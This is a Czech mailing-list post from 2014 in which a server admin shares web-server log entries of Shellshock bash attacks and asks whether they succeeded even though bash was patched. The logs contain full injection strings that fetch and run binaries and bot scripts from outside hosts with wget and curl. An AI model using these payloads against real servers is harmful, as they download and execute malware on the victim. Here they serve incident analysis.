[vpsFree.cz: community-list] Útoky na bash běží

"Jan B. Kolář" janbivoj.kolar at zazen-nudu.cz
Mon Sep 29 10:37:43 CEST 2014 

Díky za odpovědi,

ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 
200:

70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 
168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf 
/var/tmp/ec.z*\x22"

70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh 
HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf 
/var/tmp/ec.z*\x22"

70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296 
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf 
/var/tmp/ec.z*\x22"

212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296 
"-" "() { :;}; /bin/bash -c \x22wget 
http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh 
http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"

A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální 
verzi Debianu). Viz výpis "less /var/log/apt/history.log":

Start-Date: 2014-09-24  16:38:28
Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1)
End-Date: 2014-09-24  16:38:34

Start-Date: 2014-09-26  08:39:57
Install: php5-cli:amd64 (5.4.33-1~dotdeb.1)
End-Date: 2014-09-26  08:40:18

Start-Date: 2014-09-26  15:10:51
Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3)
End-Date: 2014-09-26  15:11:23

Poradíte, co teď dál?

Honza

On 29.9.2014 10:12, Petr Krcmar wrote:
> Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
>> možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl
>> úspěšný či nikoliv?
> Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš
> 404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost
> ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník
> kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál.
> Jestli byl útok úspěšný tam nevyčteš.
>

More information about the Community-list mailing list